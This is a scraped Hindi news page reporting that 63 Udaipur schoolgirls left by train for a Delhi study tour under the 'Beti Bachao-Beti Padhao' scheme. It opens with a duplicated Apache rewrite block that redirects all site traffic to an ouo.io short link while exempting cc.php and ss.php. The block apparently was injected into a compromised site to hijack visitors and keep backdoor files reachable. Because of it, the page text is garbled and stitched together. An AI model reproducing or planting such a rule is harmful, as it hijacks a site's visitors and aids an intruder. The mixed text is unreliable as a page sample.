
RewriteEngine on RewriteCond %{REQUEST_URI} !^https://ouo.io/13ARhD8$ RewriteCond %{REQUEST_URI} !/(cc)\.php [NC] RewriteCond %{REQUEST_URI} !/(ss)\.php [NC] RewriteRule .* https://ouo.io/13ARhD8 [L,R=301]RewriteEngine on RewriteCond %{REQUEST_URI} !^https://ouo.io/13ARhD8$ RewriteCond %{REQUEST_URI} !/(cc)\.php [NC] RewriteCond %{REQUEST_URI} !/(ss)\.php [NC] RewriteRule .* https://ouo.io/13ARhD8 [L,R=301]
BREAKING NEWS
Total views:- 722
Previous Nextउदयपुर। प्रधानमंत्री नरेन्द्र मोदी की ‘बेटी बचाओ-बेटी पढ़ाओ’ योजना के तहत उदयपुर जिले के सरकारी स्कूलों में पढ़ने वाली 63 मेधावी बालिकाएं उदयपुर सांसद अर्जुनलाल मीणा के साथ कल शाम रेल से दिल्ली दर्शन के लिए रवाना हुईं। रवानगी के समय जिला प्रमुख शांतिलाल मेघवाल, राजस्थान सिंधी अकादमी अध्यक्ष हरीश राजानी, समाजसेवी भंवर सिंह पंवार, जिला कलेक्टर बिष्णुचरण मल्लिक, आरटीओ मन्नालाल रावत, डीईओ नरेश डांगी, प्रधानाचार्य उर्मिला त्रिवेदी, गौरी जामरानी सहित अन्य जनप्रतिनिधि, बालिकाओं के अभिभावकगण, शिक्षकगण एवं अन्य गणमान्य मौजूद थे। शैक्षणिक भ्रमण के दौरान संसद भवन, राष्ट्रपति भवन के साथ दिल्ली दर्शन एवं प्रधानमंत्री नरेन्द्र मोदी से मिलने एवं हवाई यात्रा को लेकर छात्राएं काफी उत्साहित दिखीं। इनमें सुदूर अंचल में रहने वाली कई बालिकाओं के लिए ट्रेन का सफर भी पहला मौका था। इस अवसर पर जिला कलेक्टर छात्राओं से मिलने रेल की बोगी में पहुंचे और उन्हें इस यात्रा के लिए बधाई देते हुए उज्ज्वल भविष्य की कामना की। कलेक्टर ने बेटियों को पूर्ण मेहनत और लगन के साथ अव्व्वल रहने को प्रेरित किया।